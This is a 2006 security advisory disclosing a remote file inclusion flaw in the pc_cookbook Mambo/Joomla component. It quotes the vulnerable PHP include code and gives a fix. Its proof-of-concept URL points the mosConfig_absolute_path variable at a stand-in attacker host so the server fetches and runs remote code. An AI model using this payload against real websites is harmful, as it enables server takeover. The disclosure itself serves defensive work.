pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities

Advisory Content :

_ _____/_ ___ / | \_____ | __)_ / // ~ / | |
\ ___ Y / | /_______ / ______ /___|_ /_______ /

/ / / /

.OR.ID

ECHO_ADV_37$2006

------------------------------------------------------------------------
-----------------------

[ECHO_ADV_37$2006] pc_cookbook Mambo/Joomla Component <= v0.3 Remote File
Include Vulnerabilities

------------------------------------------------------------------------
-----------------------

Author : Ahmad Maulana a.k.a Matdhule

Date : July 10th 2006

Location : Indonesia, Jakarta

Web : http://advisories.echo.or.id/adv/adv37-matdhule-2006.txt

Critical Lvl : Highly critical

Impact : System access

Where : From Remote

------------------------------------------------------------------------

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pc_cookbook Component

Application : pc_cookbook Component

version : 0.3

URL : http://www.dianthos.net &
http://www.fisheye.gr/koyansblog

------------------------------------------------------------------------

Vulnerability:

~~~~~~~~~~~~~~~

in folder com_pccookbook we found vulnerability script pccookbook.php.

-----------------------pccookbook.php----------------------

....

<?php

//pc_cookbook Component//

/**

* Content code

* @package hello_world

* Original @Copyright (C) 2005 Robert Prince

* @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis

* @ All rights reserved

* @ pc_cookbook is Free Software

* @ Released under GNU/GPL License :

http://www.gnu.org/copyleft/gpl.html

* @version koyans 0.3

* @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog

**/

global $mosConfig_absolute_path;

global $mosConfig_live_site;

// include language file, or default to english

if (file_exists ($mosConfig_absolute_path .

'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php')) {

include_once ($mosConfig_absolute_path .

'/components/com_pccookbook/languages/' . $mosConfig_lang . '.php');

} else {

include_once ($mosConfig_absolute_path .

'/components/com_pccookbook/languages/english.php');

} // end if

?>

...

----------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized. When

register_globals=on

and allow_fopenurl=on an attacker can exploit this vulnerability with a

simple php injection script.

Proof Of Concept:

~~~~~~~~~~~~~~~~

http://[target]/[path]/components/com_pccookbook/pccookbook.php?mosConfi

g_absolute_path=http://attacker.com/evil.txt?

Solution:

~~~~~~~~

sanitize variabel $mosConfig_absolute_path in pccookbook.php

------------------------------------------------------------------------

---

Shoutz:

~~~~~~

~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ newbie_hacker (at) yahoogroups (dot) com [email concealed],
jasakom_perjuangan (at) yahoogroups (dot) com [email concealed]

~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net

------------------------------------------------------------------------

---

Contact:

~~~~~~~

matdhule[at]gmail[dot]com

-------------------------------- [ EOF ]----------------------------------

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason

pc_cookbook Mambo/Joomla Component <= v0.3 Remote File Include Vulnerabilities